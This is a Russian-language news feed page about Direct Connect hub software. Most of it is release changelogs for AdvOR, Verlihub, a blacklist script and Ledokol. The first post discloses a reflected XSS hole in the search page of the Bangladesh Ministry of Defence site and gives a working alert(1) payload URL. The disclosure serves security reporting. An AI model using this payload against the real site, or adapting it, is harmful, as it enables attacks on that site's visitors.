This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Перейти вверх
18.97.9.174.US.SSL

Ministry of Defence of Bangladesh - XSS

Vulnerable page: http://www.mod.gov.bd/site/search?key=

PoC
http://www.mod.gov.bd/site/search?key=<!--<img%20src="--><img%20src=x%20onerror=alert(1)//">

You can either include any XSS code in search input box, or request any XSS code directly using GET method and key parameter.

PoC


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Написано Neo в 2017-09-07 22:04 1 comment 8 likes

Advanced Onion Router AdvOR 0.3.1.4

Changes in 0.3.1.4
- geoip_c.h was updated with GeoIPCountryWhois.csv released on June 7'th; there are 153678 IP ranges having 32 ranges in the fake "A1" country; 31 ranges were approximated to real countries
- the OpenSSL library was updated to 1.1.0f

File information: AdvOR 0.3.1.4
Написано advor в 2017-06-11 10:48 0 comments 8 likes

Verlihub Python Scripts Blacklist 1.2.2.6

Changes in 1.2.2.6
# 1.2.2.6 - Fixed bypass of public proxy lookup for local and private IP addresses in chat mode

File information: Blacklist 1.2.2.6
Написано vhpython в 2017-05-22 12:47 0 comments 9 likes

Verlihub Verlihub 1.0.3.9

Even more stable.

Changes in 1.0.3.9
Commit log: https://github.com/verlihub/verlihub/commits/master

File information: Verlihub 1.0.3.9
Написано verlihub в 2017-05-22 12:41 0 comments 9 likes

Ledokol Ledokol 2.9.3.46

Changes in 2.9.3.46
[ 36] Fixed: Errors on configuration conversion from string to number and vice versa, report by Alexandr
[ 38] Fixed: Lua 5.3 number to string conversions in MySQL queries
[ 39] Fixed: Missing default password value when adding new PM block entry
[ 37] Added: Optional reason to country code gag
[ 40] Added: Optional filter parameter to word ranks command, request by Meka][Meka
[ 41] Added: Split help texts and send on hub help command execution
[ 42] Added: Replacer debug configuration repldebug, request by KCAHDEP
[ 43] Added: IP gag now supports single IP, range or LRE, request by KCAHDEP
[ 44] Added: Forbidden chat nick MyINFO check
[ 45] Added: Column support to Team Elite hublist user search
[ 46] Added: Default type and limit parameters to user logger command, idea by Lord_Zero

File information: Ledokol 2.9.3.46
Написано ledokol в 2017-05-22 12:34 0 comments 8 likes